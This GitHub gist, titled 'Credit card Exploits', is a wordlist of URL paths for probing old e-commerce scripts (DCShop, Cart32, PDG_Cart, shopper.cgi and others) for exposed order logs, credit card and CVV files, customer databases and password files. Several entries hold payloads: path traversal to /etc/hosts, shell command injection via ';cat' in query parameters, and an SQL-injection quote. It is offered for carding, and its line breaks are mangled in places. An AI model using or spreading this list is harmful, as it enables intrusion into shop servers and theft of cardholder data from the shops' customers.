Skip to content

Instantly share code, notes, and snippets.

@dreadpiratesr
Created November 5, 2015 16:14
Show Gist options
  • Select an option

  • Save dreadpiratesr/cdb8801b8b7dabfdce04 to your computer and use it in GitHub Desktop.

Select an option

Save dreadpiratesr/cdb8801b8b7dabfdce04 to your computer and use it in GitHub Desktop.

Revisions

  1. dreadpiratesr created this gist Nov 5, 2015.
    270 changes: 270 additions & 0 deletions Credit card Exploits
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,270 @@
    /cgi-bin/DCShop/Orders/orders.txt
    /vpasp/shopdbtest.asp
    /orders/checks.txt
    /WebShop/logs
    /ccbill/secure/ccbill.log /scripts/cart32.exe
    /cvv2.txt
    /cart/shopdbtest.asp
    /cgi-win/cart.pl
    /shopdbtest.asp
    /WebShop/logs/cc.txt /cgi-local/cart.pl
    /PDG_Cart/order.log
    /config/datasources/expire.mdb
    /cgi-bin/ezmall2000/mall2000.cgi?
    page=../mall_log_files/order.log
    %00html /orders/orders.txt
    /cgis/cart.pl
    /webcart/carts
    /cgi-bin/cart32.exe/cart32clientlist
    /cgi/cart.pl
    /comersus/database/comersus.mdb /WebShop/templates/cc.txt
    /Admin_files/order.log
    /orders/mountain.cfg
    /cgi-sys/cart.pl
    /scripts/cart.pl
    /htbin/cart.pl /productcart/database/EIPC.mdb
    /shoponline/fpdb/shop.mdb
    /config/datasources/myorder.mdb
    /PDG_Cart/shopper.conf
    /shopping/database/metacart.mdb
    /bin/cart.pl /cgi-bin/cart32.ini
    /database/comersus.mdb
    /cgi-local/medstore/loadpage.cgi?
    user_id=id&file=data/orders.txt
    /cgi-bin/store/Admin_files/
    myorderlog.txt /cgi-bin/orders.txt
    /cgi-bin/store/Admin_files/
    your_order.log
    /test/test.txt
    /fpdb/shop.mdb
    /cgibin/shop/orders/orders.txt /shopadmin1.asp
    /cgi-bin/shop.cgi
    /cgi-bin/commercesql/index.cgi?
    page=../admin/manager.cgi
    /cgi-bin/PDG_cart/card.txt
    /shopper.cgi? preadd=action&key=PROFA&
    template=order 1.log
    /store/shopdbtest.asp
    /log_files/your_order.log
    /_database/expire.mdb
    /HyperStat/stat_what.log /cgibin/DCShop/auth_data/
    auth_user_file.txt
    /htbin/orders/orders.txt
    /SHOP/shopadmin.asp
    /index.cgi?page=../admin/files/
    order.log /vpshop/shopadmin.asp
    /webcart/config
    /PDG/order.txt
    /cgi-bin/shopper.cgi
    /orders/order.log
    /orders/db/zzzbizorders.log.html /easylog/easylog.html
    /cgi-bin/store/Log_files/
    your_order.log
    /cgi-bin/%20shopper.cgi?
    preadd=action&key=PROFA&
    template=sh opping400.mdb /comersus_message.asp?
    /orders/import.txt
    /htbin/DCShop/auth_data/
    auth_user_file.txt
    /admin/html_lib.pl
    /cgi-bin/%20shopper.cgi? preadd=action&key=PROFA&
    template=my order.txt
    /cgi-bin/DCShop/auth_data/
    auth_user_file.txt
    /cgi-bin/shop.pl/page=;cat
    %20shop.pl /cgi-bin/shopper?
    search=action&keywords=
    dhenzuser%20&templa te=order.log
    /HBill/htpasswd
    /bin/shop/auth_data/
    auth_user_file.txt /cgi-bin/cs/shopdbtest.asp
    /mysql/shopping.mdb
    /Catalog/config/datasources/
    Products.mdb
    /trafficlog
    /cgi/orders/orders.txt /cgi-local/PDG_Cart/shopper.conf
    /store/cgi-bin/Admin_files/
    expire.mdb
    /derbyteccgi/shopper.cgi?
    key=SC7021&preadd=action&
    template=orde r.log /derbyteccgi/shopper.cgi?
    search=action&keywords=moron&
    template= order.log
    /cgi-bin/mc.txt
    /cgi-bin/mall2000.cgi
    /cgi-win/DCShop/auth_data/ auth_user_file.txt
    /cgi-bin/shopper.cgi?
    search=action&keywords=root
    %20&templat e=order.log
    /store/commerce.cgi
    /scripts/shop/orders/orders.txt /product/shopping350.mdb
    /super_stats/access_logs
    /cgi-local/orders/orders.txt
    /cgi-bin/PDG_Cart/mc.txt
    /cgibin/cart32.exe
    /cgi-bin/Shopper.exe? search=action&keywords=psiber
    %20&templ ate=other/
    risinglogorder.log
    /cgibin/password.txt
    /Catalog/cart/carttrial.dat
    /catalog/Admin/Admin.asp /ecommerce/admin/user/admin.asp
    /data/productcart/database/EIPC.mdb
    /store/admin_files/
    commerce_user_lib.pl
    /cgi-bin/store/index.cgi
    /paynet.txt /config/datasources/store/
    billing.mdb
    /_database/shopping350.mdb
    /cgi-bin/shopper.exe?search
    /cgi/shop.pl/page=;cat%20shop.pl
    /cgi-bin/store/Admin_files/orders.txt /cgi-bin/store/commerce_user_lib.pl
    /cgi-sys/pagelog.cgi
    /cgi-sys/shop.pl/page=;cat
    %20shop.pl
    /scripts/weblog
    /fpdb/shopping400.mdb /htbin/shop/orders/orders.txt
    /cgi-bin/%20shopper.cgi?
    preadd=action&key=PROFA&
    template=my order.log
    /cgi-bin/shopper.exe?
    search=action&keywords=psiber& template =order.log
    /mall_log_files/
    /cgi-bin/perlshop.cgi
    /tienda/shopdbtest.asp
    /cgi-bin/%20shopper.cgi?
    preadd=action&key=PROFA& template=sh opping.mdb
    /cgi-bin/shopper.cgi?
    search=action&keywords=whinhall&
    templa te=order.log
    /WebShop/logs/ck.log
    /fpdb/shopping300.mdb /mysql/store.mdb
    /cgi-bin/store/Admin_files/
    commerce_user_lib.pl
    /config.dat
    /order/order.log
    /commerce_user_lib.pl /Admin_files/AuthorizeNet_user_lib.pl
    /cvv2.asp
    /cgi-bin/cart32/CART32-order.txt
    /wwwlog
    /cool-logs/mlog.html
    /cgi-bin/pass/merchant.cgi.log /cgi-local/pagelog.cgi
    /cgi-bin/pagelog.cgi
    /cgi-bin/orders/cc.txt
    /cgis/shop/orders/orders.txt
    /admin/admin_conf.pl
    /cgi-bin/pdg_cart/order.log /cgi/PDG_Cart/order.log
    /Admin_files/ccelog.txt
    /cgi-bin/orders/mc.txt
    /cgi/cart32.exe
    /ecommerce/admin/admin.asp
    /scripts/DCShop/auth_data/ auth_user_file.txt
    /Catalog/config/datasources/
    Expire.mdb
    /ecommerce/admin/shopdbtest.asp
    /mysql/mystore.mdb
    /cgi-bin/%20shopper.cgi? preadd=action&key=PROFA&
    template=sh opping.asp
    /cgi-bin/commercesql/index.cgi?
    page=../admin/files/order.log
    /cgi-bin/Count.cgi?df=callcard.dat
    /logfiles/ /shopping/shopping350.mdb
    /admin/configuration.pl
    /cgis/DCShop/auth_data/
    auth_user_file.txt
    /cgis/cart32.exe
    /cgi-bin/dcshop.cgi /cgi-win/shop/auth_data/
    auth_user_file.txt
    /shopping400.mdb
    /HBill/config
    /cgi-bin/shop/index.cgi?page=../
    admin/files/order.log /search=action&keywords=GSD
    %20&template=order.log
    /WebCart/orders.txt
    /PDG_Cart/authorizenets.txt
    /cgi-bin/AnyForm2
    /~gcw/cgi-bin/Count.cgi? df=callcard.dat
    /cgi-bin/PDG_Cart/order.log
    /expire.mdb
    /logger/
    /webcart-lite/orders/import.txt
    /cgi-bin/commercesql/index.cgi? page=../admin/admin_conf.pl
    /cgi-bin/PDG_Cart/shopper.conf
    /cgi-bin/cart32.exe
    /dc/orders/orders.txt
    /cgi-local/DCShop/orders/orders.txt
    /shop.pl/page=shop.cfg /cgi-local/cart32.exe
    /cgi-win/pagelog.cgi
    /cgi-win/shop/orders/orders.txt
    /cgibin/shopper.cgi?
    search=action&keywords=moron&
    template= order.csv /cgi-sys/DCShop/auth_data/
    auth_user_file.txt
    /cgi-bin/www-sql;;;
    /cgi-bin/%20shopper.cgi?
    preadd=action&key=PROFA&
    template=or der.log /scripts/orders/orders.txt
    /cgi-local/shop.pl/shop.cfg
    /search=action&keywords=cwtb
    %20&template=expire.mdb
    /php/mylog.phtml
    /config/datasources/shopping.mdb /php-coolfile/action.php?
    action=edit&file=config.php
    /cgi-bin/ezmall2000/mall2000.cgi
    /cgi/DCShop/orders/orders.txt
    /cgi-local/shop.pl
    /cgis/DCShop/orders/orders.txt /product/shopdbtest.asp
    /ASP/cart/database/metacart.mdb
    /cgi-bin/cgi-lib.pl
    /cgi-bin/mailview.cgi?
    cmd=view&fldrname=inbox&select=
    1&html /search=action&keywords=cwtb
    %20&template=order.log
    /mysql/expire.mdb
    /scripts/shop/auth_data/
    auth_user_file.txt
    /cgi-bin/cart32/whatever- OUTPUT.txt
    /Shopping%20Cart/shopdbtest.asp
    /cgi/shop/auth_data/
    auth_user_file.txt
    /shop/shopping350.mdb
    /cgi-bin/store/Authorize_Net.pl /scripts/DCShop/orders/orders.txt
    /store/log_files/commerce_user_lib.pl
    /shopping/shopadmin.asp
    /cgi-bin/orderlog.txt
    /cgi-bin/webcart/webcart.cgi?
    CONFIG=mountain&CHANGE=YES& NEXTPAGE=;c at%20../../webcart/
    system/orders/orders.txt|
    &CODE=PHOLD;;;
    /cool-logs/mylog.html
    /cgibin/shop.pl/page=;cat%20shop.pl
    /htbin/shop.pl/page=;cat%20shop.pl /cgi-win/orders/orders.txt
    /cgi-bin/%20shopper.cgi?
    preadd=action&key=PROFA&
    template=or der1.txt
    /SHOP/shopdbtest.asp
    /cgi/pagelog.cgi /php/mlog.phtml
    /cgi-bin/shop/apdproducts.mdb
    /htbin/shop/auth_data/
    auth_user_file.txt
    /server%20logfile;;;
    /database/metacart.mdb /cgi-local/shop/orders/orders.txt
    /dcshop/auth_data/auth_user_file.txt
    /log/
    /cgi-bin/shop.cgi/page=../../../../etc/
    hosts
    /scripts/c32web.exe /cgis/orders/orders.txt
    /logfile/
    /shop_db/shopping.mdb
    /shopping.mdb
    /weblog/
    /config/datasources/cvv2.mdb /cgi-bin/loadpage.cgi?
    user_id=id&file=data/db.txtcgi-bin/
    PDG_Cart/order.log
    /cgi-sys/shop/orders/orders.txt
    /cgi-bin/%20shopper.cgi?
    preadd=action&key=PROFA& template=or der1.log
    /cgi-win/cart32.exe
    /cgi-bin/loadpage.cgi
    /dcshop/orders/orders.txt
    /shop/show.php?q='
    /cgibin/orders/orders.txt /bin/pagelog.cgi